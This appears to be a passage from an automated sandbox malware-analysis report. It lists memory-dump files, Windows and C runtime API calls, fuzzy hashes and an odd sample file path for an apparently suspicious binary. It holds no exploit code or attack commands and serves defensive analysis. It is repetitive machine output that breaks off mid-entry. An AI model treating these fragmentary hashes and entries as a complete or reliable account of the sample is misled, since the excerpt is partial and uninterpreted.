          • String ID:
          • API String ID: 2388904642-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: ClearVariant
          • String ID:
          • API String ID: 1473721057-0
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SystemParametersInfoW.USER32 ref: 0113D979
          • FreeLibrary.KERNEL32(?), ref: 0113D98E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: FreeInfoLibraryParametersSystem
          • String ID:
          • API String ID: 3403648963-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: _malloc_wcscpy_wcslen
          • String ID:
          • API String ID: 245337311-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,?), ref: 0118E454
          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0118E467
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: PrivateProfileStringWrite$FullNamePath
          • String ID:
          • API String ID: 3876400906-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0113E094,?,00000001,?,01133653,?), ref: 011407CA
          • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0113E094,?,00000001,?,01133653,?), ref: 01156296
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 011316E5
            • Part of subcall function 01132390: _wcslen.LIBCMT ref: 0113239D
            • Part of subcall function 01132390: _memmove.LIBCMT ref: 011323C3
          • _wcscat.LIBCMT ref: 01158BC8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: FullNamePath_memmove_wcscat_wcslen
          • String ID:
          • API String ID: 189345764-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 01147E9A: __getptd_noexit.LIBCMT ref: 01147E9A
          • __lock_file.LIBCMT ref: 011449AD
            • Part of subcall function 01145391: __lock.LIBCMT ref: 011453B6
          • __fclose_nolock.LIBCMT ref: 011449B8
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
          • String ID:
          • API String ID: 2800547568-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • timeGetTime.WINMM ref: 0113D5DC
            • Part of subcall function 01139430: PeekMessageW.USER32 ref: 011394B6
          • Sleep.KERNEL32(00000000), ref: 0115E125
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: MessagePeekSleepTimetime
          • String ID:
          • API String ID: 1792118007-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • ___crtCorExitProcess.LIBCMT ref: 011415AA
            • Part of subcall function 01141577: GetModuleHandleW.KERNEL32(mscoree.dll,?,011415AF,?,?,0114350A,000000FF,0000001E,00000001,00000000,00000000,?,01146A35,?,00000001,?), ref: 01141581
            • Part of subcall function 01141577: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01141591
          • ExitProcess.KERNEL32 ref: 011415B3
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: ExitProcess$AddressHandleModuleProc___crt
          • String ID:
          • API String ID: 2427264223-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0113378C,?,?,?,00000010), ref: 01133D38
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 01133D71
            • Part of subcall function 01133DA0: _memmove.LIBCMT ref: 01133DD7
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharMultiWide$_malloc_memmove
          • String ID:
          • API String ID: 961785871-0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 0119FAAB
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp
          Similarity
          • API ID: _malloc_memmove
          • String ID:
          • API String ID: 1183979061-0
          • Opcode ID: 6ecc1d65cee3878cb8a37e0fd51739bd65560edfe5950fc89edd5e9a0728b520
          • Instruction ID: 21fd052df90a327d9e84f9c9c027bba50f78e707e25b0d53e57ae9d17ca00def
          • Opcode Fuzzy Hash: 6ecc1d65cee3878cb8a37e0fd51739bd65560edfe5950fc89edd5e9a0728b520
          • Instruction Fuzzy Hash: 4E51F5762043036BDB08EF68CD81F5AB7A9BFA8618F044518F9658B341D735EC06C7A1
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 53fa7824ccd7e712625b3220eed34661da1da2e085ece074da8426240376003e
          • Instruction ID: 53075455ec287f2b02d656e99f52ba0057f9eba09cf7fb6e7dbed7b9d79a26b9
          • Opcode Fuzzy Hash: 53fa7824ccd7e712625b3220eed34661da1da2e085ece074da8426240376003e
          • Instruction Fuzzy Hash: BA31FDF4A08601EBDB2DEF2DC8C1F26B7A8BF90604B184919D9058B316F775F484D79A
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _free
          • String ID:
          • API String ID: 269201875-0
          • Opcode ID: 495f52db772368a768388c24ea7b3457934a9ce9ade51b2ebebde63422acb429
          • Instruction ID: 57d21eef13c56506398a05f75bb74f53ae0241b5d8b5d1d11252bbfaed7701d7
          • Opcode Fuzzy Hash: 495f52db772368a768388c24ea7b3457934a9ce9ade51b2ebebde63422acb429
          • Instruction Fuzzy Hash: 0E4158B4504A07DBCB1CEF14D484A6AFBF0FF59318F24891DC5A55B384D7B1A990CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: 91fc19bd4065697285edb2c8f5e3653549bebf239cce6adc049fcabd7a427a77
          • Instruction ID: d1db11d57e3da0e3c4ba6318148940d54f5e8f6964fa77fbaa686ff386dcb886
          • Opcode Fuzzy Hash: 91fc19bd4065697285edb2c8f5e3653549bebf239cce6adc049fcabd7a427a77
          • Instruction Fuzzy Hash: 9931A371E00209EBEF188F96D9826AEFBF4FF44700F1484A9DC65D6254E7389990C780
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: f5a74ee0de9d3f90c54d6d8c4152870019cd0d6ddf2f926efa464ce634fdf912
          • Instruction ID: fd5c3945cfc58cd165ac3ab63cdcf32cd6d5e9f3e46504678e13aa753e2dc265
          • Opcode Fuzzy Hash: f5a74ee0de9d3f90c54d6d8c4152870019cd0d6ddf2f926efa464ce634fdf912
          • Instruction Fuzzy Hash: 33316EB9600A12EFD728EF28C590A61F7E0FF49710705C569DA99CBB59E330E852CB91
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: d251ceefb4344b56acfb1aecb4842f42c2e22e52fe3c68e92368d3b21e3f2231
          • Instruction ID: 2fa59405b1e6b2fb8fc564a43ecf6204b20634bfae9c953541a29fd234cc3b2f
          • Opcode Fuzzy Hash: d251ceefb4344b56acfb1aecb4842f42c2e22e52fe3c68e92368d3b21e3f2231
          • Instruction Fuzzy Hash: C4319070A10201DFC72CDF68C48196AB3F5FF98304B60845DD9A68B395EB32EE51CB95
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0113E248
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FilePointer
          • String ID:
          • API String ID: 973152223-0
          • Opcode ID: bdd5b82d2fa038f917a4e88cd7d6f79d48f244f99d26932f5e4652acb2244f29
          • Instruction ID: 86f64d393afaaf243bb017dd485b82b32e1f544d7bdd3f07b626499957d660a2
          • Opcode Fuzzy Hash: bdd5b82d2fa038f917a4e88cd7d6f79d48f244f99d26932f5e4652acb2244f29
          • Instruction Fuzzy Hash: 19318D71601705DFCB6CCE6CD88496ABBF6FBC8620B15CA2DE85A83708D770F8458B51
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: CreateProcess
          • String ID:
          • API String ID: 963392458-0
          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
          • Instruction ID: ad3a7740b500ad22206b96f7195c1f0ba11d0829e5af36b1bdc6cefbd217a9ab
          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
          • Instruction Fuzzy Hash: 3131D470A00205DBD71CDF5AC490AA9FBA6FF49700B2586E5E60ACB252D731EDC1CBC9
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: 524a191e29a1770ef621affbbb06a6eccf5a2c9ba95319f342c6d853233068f1
          • Instruction ID: 7069b36e3713413a4b4907da185a4ad93806330c9d44efe539cfb28eceabcc65
          • Opcode Fuzzy Hash: 524a191e29a1770ef621affbbb06a6eccf5a2c9ba95319f342c6d853233068f1
          • Instruction Fuzzy Hash: FD315E7460060AEBDF199F16D9506AE7BB4FF45751F20C829EC99CA740E734E690C7D0
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 89c8882d0952a4da07812503fdf24c26bea1436fd0de38e26a68751513a3c4d6
          • Instruction ID: b25a2ae7e735f708218ab9d098687e672aeb3d2ad121bec739efd40c28cb9b87
          • Opcode Fuzzy Hash: 89c8882d0952a4da07812503fdf24c26bea1436fd0de38e26a68751513a3c4d6
          • Instruction Fuzzy Hash: 7E11E4B4600245DBDB3CDF2CCC89E2A77A4BF9071CB24480ED95597208D7B5E880CF92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetShortPathNameW.KERNELBASE ref: 0118CA1A
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: NamePath$FullShort
          • String ID:
          • API String ID: 4229621559-0
          • Opcode ID: aa57b3c6cd154a60ae0fbb20f9a1701c983ebbbda8c1a8ab9c16a8fda8eb255f
          • Instruction ID: 44281162316a12870b1ce6f20db5e6927d691ad7f2b0958a6955b1a87fd70c51
          • Opcode Fuzzy Hash: aa57b3c6cd154a60ae0fbb20f9a1701c983ebbbda8c1a8ab9c16a8fda8eb255f
          • Instruction Fuzzy Hash: E6119875A102059BCB18FB64D8C4E9AB3A8FF54714F10C669E925D7350EB30ED448FA0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 0113F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\77066510\txoxpdjc.qnr,0113F1F5,C:\Users\user\77066510\txoxpdjc.qnr,011D90E8,C:\Users\user\77066510\txoxpdjc.qnr,?,0113F1F5,?,?,00000001), ref: 0113F23C
          • GetPrivateProfileStringW.KERNEL32 ref: 0118E501
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FullNamePathPrivateProfileString_malloc
          • String ID:
          • API String ID: 3364953200-0
          • Opcode ID: 338510c0e26e407d3cecf7ee2dd35074bed692aa99fbded66cd875019d1aee29
          • Instruction ID: 2eb6ecb788a92f7ba65d8e2b2755747fe3f788bf71af5e0755b0179e8e7997b1
          • Opcode Fuzzy Hash: 338510c0e26e407d3cecf7ee2dd35074bed692aa99fbded66cd875019d1aee29
          • Instruction Fuzzy Hash: C7015275A1020A7BCB14FBA1DC84CAF77ACEFA4724B048569AC1997340DB30ED45CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • RtlAllocateHeap.NTDLL(00000008,011412DC,00000000,?,01146A7F,?,011412DC,00000000,00000000,00000000,?,0114793E,00000001,00000214,?,011412DC), ref: 0114F5DA
            • Part of subcall function 01147E9A: __getptd_noexit.LIBCMT ref: 01147E9A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: AllocateHeap__getptd_noexit
          • String ID:
          • API String ID: 328603210-0
          • Opcode ID: 67c442153be401e62e06826bc9f3267ec8b9e6af122734201888eecd7b4ec1ca
          • Instruction ID: 26a49a1cb42f3b5146fd034d92a0919d96a5d28b06d9678908061ab883cd769e
          • Opcode Fuzzy Hash: 67c442153be401e62e06826bc9f3267ec8b9e6af122734201888eecd7b4ec1ca
          • Instruction Fuzzy Hash: FB01B53620021B9BEB2D8E3CD854B673B54AB81E60F154629E815CF390D770D842C790
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 01133B92
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: FileRead
          • String ID:
          • API String ID: 2738559852-0
          • Opcode ID: 91d013581390ca68589d00af8ae92f0566dd0d9bd9c67041c5d830e6a7368fc8
          • Instruction ID: e8971ac3780dd0a0d27e4f7776d03abb9e4f26efbbd3cdef071fa8c497988f76
          • Opcode Fuzzy Hash: 91d013581390ca68589d00af8ae92f0566dd0d9bd9c67041c5d830e6a7368fc8
          • Instruction Fuzzy Hash: EA112570210B019FE328CF19C890B27BBF8BF80750F14891ED5AA86A58D774E845CBA4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _memmove
          • String ID:
          • API String ID: 4104443479-0
          • Opcode ID: d7df6f1c3bf380875f3d76c07e2d564d117bbb96902566e4ed17141c66e28c9c
          • Instruction ID: ee6442700090ece798504072d7a63c80009da396ac9c6a2928818127e1745bbd
          • Opcode Fuzzy Hash: d7df6f1c3bf380875f3d76c07e2d564d117bbb96902566e4ed17141c66e28c9c
          • Instruction Fuzzy Hash: DC015A71610601AFC328DF6CC941D2BB3F4EFA9B58714886DE59AC7755EB32E802CB90
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 0117C17E
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _malloc_memmove
          • String ID:
          • API String ID: 1183979061-0
          • Opcode ID: 6351c0f4b984825ce77304353fc728d096f045944bdd63b4c2460a394832c6d3
          • Instruction ID: 1a1d3d82c0abbfeb101a98236535e4baa41226753196030fd9c40b0ac73efecd
          • Opcode Fuzzy Hash: 6351c0f4b984825ce77304353fc728d096f045944bdd63b4c2460a394832c6d3
          • Instruction Fuzzy Hash: EC015E35104641AFC329AF18C940D6BB7F9EFAA644710885DE8DA87B01D731EC02C7A4
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: __lock_file
          • String ID:
          • API String ID: 3031932315-0
          • Opcode ID: 0439343d3e6544991f0f30b3dd3e71e5e47492c0e1ea234e11ec01398b401008
          • Instruction ID: 3c490a9e67908922b6043e5d47e38120b67e5f13a041334fa8fca84fa5862a83
          • Opcode Fuzzy Hash: 0439343d3e6544991f0f30b3dd3e71e5e47492c0e1ea234e11ec01398b401008
          • Instruction Fuzzy Hash: D701217180021AEBCF29AFA4D840A9E7F71AF14B64F008255F95455190D7318A62DFD2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: _wcscpy
          • String ID:
          • API String ID: 3048848545-0
          • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
          • Instruction ID: a65e7dd569861939041dd3ca6847568fd8e626eb829a1c219b9af3996fd2d516
          • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
          • Instruction Fuzzy Hash: 90F05C77114315365B14AB65EC41CEBB79CEFA2234700021BFA249B180E722704583F0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • _memmove.LIBCMT ref: 0115A17D
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
          • String ID:
          • API String ID: 620504543-0
          • Opcode ID: 3a2871c61f382e0ce93995e62f5cdc9a57a337e432b3222eca89fcc78cdef969
          • Instruction ID: 58afd488f417dae21b890f98fe3d058db63bd3deaaf0a13834f7dc10a066d0f4
          • Opcode Fuzzy Hash: 3a2871c61f382e0ce93995e62f5cdc9a57a337e432b3222eca89fcc78cdef969
          • Instruction Fuzzy Hash: 9201B6B8600141DFD318DF5CD491E12B7A1BFAE608B298958D6C98B345D732F951CB92
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • _memmove.LIBCMT ref: 0115D363
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
          • String ID:
          • API String ID: 620504543-0
          • Opcode ID: c2af0a326ec097fc77a722179b38a085d905882a502ce356298af663ff057104
          • Instruction ID: 4b2f4d96d5d34e8c6dd94c67d656cbc732f4360ebff6234088c66690ecccbee5
          • Opcode Fuzzy Hash: c2af0a326ec097fc77a722179b38a085d905882a502ce356298af663ff057104
          • Instruction Fuzzy Hash: 9B01FBB46045519FDB08DF68D8E0F15B7B1AF8A608F08C194DA098F359D731F856CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • CharUpperBuffW.USER32(?,?), ref: 0113ED03
          Memory Dump Source
